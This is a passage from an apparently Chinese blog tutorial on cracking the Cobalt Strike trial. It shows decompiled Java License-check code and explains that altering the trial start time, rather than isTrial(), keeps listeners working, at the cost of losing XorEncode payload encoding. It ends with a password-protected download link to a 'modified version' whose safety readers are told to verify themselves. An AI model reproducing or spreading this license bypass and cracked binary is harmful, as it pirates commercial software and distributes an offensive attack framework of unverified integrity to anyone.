            if(start == 0L)
            {
                prefs.set("cobaltstrike.start.int", (new StringBuilder()).append("").append(today).append("").toString());
                prefs.save();
                start = today;
            }
            difference = (today - start) / 0x5265c00L;
            return difference;
        }
    
        public static void checkLicenseGUI()
        {
            getTimeSinceStart();
        }
    
        public static boolean isTrial()
        {
            return true;
        }
    
        public static void checkLicenseConsole()
        {
        }
    
        private static long life = 65535L;
        private static long today = 0L;
        private static long start = 0L;
        private static long difference = 0L;
    
    }
    

    在这里有个坑,参照这篇文章进行破解是有问题的,它直接修改了common.License.isTrial()的返回值为false。

    public static boolean isTrial()
      {
        return true;
        // 必须修改函数
        // return false; //edit here
      }
    

    导致在ArtifactUtils类中处理函数XorEncode直接走向payload的Encode。

        public static byte[] XorEncode(byte data[], String arch)
        {
            if(License.isTrial())
            {
                CommonUtils.print_trial((new StringBuilder()).append("Disabled ").append(arch).append(" payload stage encoding.").toString());
                return data;
            }
            AssertUtils.Test(data.length > 16384, "XorEncode used on a stager (or some other small thing)");
            AssertUtils.TestArch(arch);
            if("x86".equals(arch))
            {
                byte decoder[] = CommonUtils.pickOption("resources/xor.bin");
                byte payload[] = XorEncoder.encode(data);
                return CommonUtils.join(decoder, payload);
            }
            if("x64".equals(arch))
            {
                byte decoder[] = CommonUtils.readResource("resources/xor64.bin");
                byte payload[] = XorEncoder.encode(data);
                return CommonUtils.join(decoder, payload);
            } else
            {
                return new byte[0];
            }
        }
    

    但是由于试用版不存在xor.bin以及xor64.bin,所以会导致无法创建监听。所以我们还是只改时间好了。然后我们的cs就可以使用了,缺点就是不能加密payload。

    5CE4860A-6B52-4E1F-A895-48EBFE03657F.png

    修改版下载链接: 链接: 戳我 密码: 86f3 安全性请自行验证!!